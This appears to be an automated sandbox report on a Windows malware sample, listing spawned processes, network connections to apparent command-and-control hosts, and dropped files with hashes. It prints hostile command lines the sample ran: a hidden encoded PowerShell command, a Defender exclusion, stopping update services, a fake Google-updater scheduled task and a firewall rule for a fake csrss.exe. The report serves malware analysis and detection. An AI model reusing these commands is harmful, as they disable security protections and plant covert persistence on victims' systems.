C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wP3939.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wP3939.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7184 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7184 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7204 -ip 7204

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ki226gq.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ki226gq.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9BC6lJ8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9BC6lJ8.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=320 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\D50E.exe

C:\Users\Admin\AppData\Local\Temp\D50E.exe

C:\Users\Admin\AppData\Local\Temp\D667.exe

C:\Users\Admin\AppData\Local\Temp\D667.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8072 -ip 8072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 784

C:\Users\Admin\AppData\Local\Temp\392.exe

C:\Users\Admin\AppData\Local\Temp\392.exe

C:\Users\Admin\AppData\Local\Temp\6C0.exe

C:\Users\Admin\AppData\Local\Temp\6C0.exe

C:\Users\Admin\AppData\Local\Temp\970.exe

C:\Users\Admin\AppData\Local\Temp\970.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\6C0.exe

C:\Users\Admin\AppData\Local\Temp\6C0.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc [encoded command not preserved]

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6532 /prefetch:8

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8148 /prefetch:2

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\C8AA.exe

C:\Users\Admin\AppData\Local\Temp\C8AA.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

Network

Country Destination Domain Proto
RU 5.42.65.80:80 5.42.65.80 tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 194.49.94.11:80 tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 api.hcaptcha.com udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 185.174.136.219:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.194:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
RU 5.42.92.51:19057 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 194.49.94.11:80 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp

Files


memory/2464-909-0x0000000000380000-0x000000000039E000-memory.dmp

memory/2464-910-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/8072-912-0x0000000000400000-0x000000000046F000-memory.dmp

memory/8072-911-0x0000000000560000-0x00000000005BA000-memory.dmp

memory/2464-916-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/8072-917-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/8072-926-0x0000000074410000-0x0000000074BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 92375e1a8332c80e9f5e4d7293615309
SHA1 4ddf36667213e30c458a5723f90d7107b9b32190
SHA256 8c4a8c4ddb545c2230ac5656592c44e831883b78d432535115f1aff5494b32cb
SHA512 392d096970eb96d779355fcfc10f4ffdec8a73ccfd96909aa5a380399b33a181911282e4b3d83f8ee13d7c707a807f01b00fce2c3c7277214f538e9ff07fe3d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5202848f290fc603370e0756ed2bba18
SHA1 0ce0d502ce4a7d12395fd7ad10ad20793c2d2136
SHA256 76d25e1db3d683f81e81ce3bace539c3750e4f425340b07ab9a838598bb1d636
SHA512 eec945bcc87e9a5298aad9ffa74554fa3e535edf8594fa12aebefaebee51e250ddcdbc109a29fddd3eaf6d3f27c37bb0402ee2a95a5c2f3daaad81d5d2a01a58

memory/5812-1024-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/5812-1025-0x0000000000200000-0x0000000000E9A000-memory.dmp

memory/6228-1034-0x00000247E1AB0000-0x00000247E1B9E000-memory.dmp

memory/6228-1036-0x00007FF82B830000-0x00007FF82C2F1000-memory.dmp

memory/6228-1037-0x00000247FBFE0000-0x00000247FC0C0000-memory.dmp

memory/6228-1038-0x00000247FC130000-0x00000247FC210000-memory.dmp

memory/5512-1042-0x00000251C6630000-0x00000251C66D2000-memory.dmp

memory/2464-1041-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/6228-1053-0x00000247FC210000-0x00000247FC2D8000-memory.dmp

memory/6228-1052-0x00000247E1F60000-0x00000247E1F70000-memory.dmp

memory/5512-1056-0x00000251C8380000-0x00000251C8480000-memory.dmp

memory/6228-1058-0x00000247FC3E0000-0x00000247FC4A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 bc3354a4cd405a2f2f98e8b343a7d08d
SHA1 4880d2a987354a3163461fddd2422e905976c5b2
SHA256 fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b
SHA512 fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvcocr1d.ixv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
